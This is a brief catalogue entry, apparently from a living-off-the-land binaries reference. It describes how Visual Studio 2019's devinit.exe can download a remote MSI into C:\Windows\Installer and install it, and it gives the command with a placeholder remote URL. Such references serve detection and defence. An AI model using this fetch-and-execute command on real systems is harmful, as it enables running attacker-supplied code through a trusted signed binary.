Visual Studio 2019 tool
Downloads an MSI file to C:\Windows\Installer and then installs it.
devinit.exe run -t msi-install -i {REMOTEURL:.msi}
Executes code from a (remote) MSI file.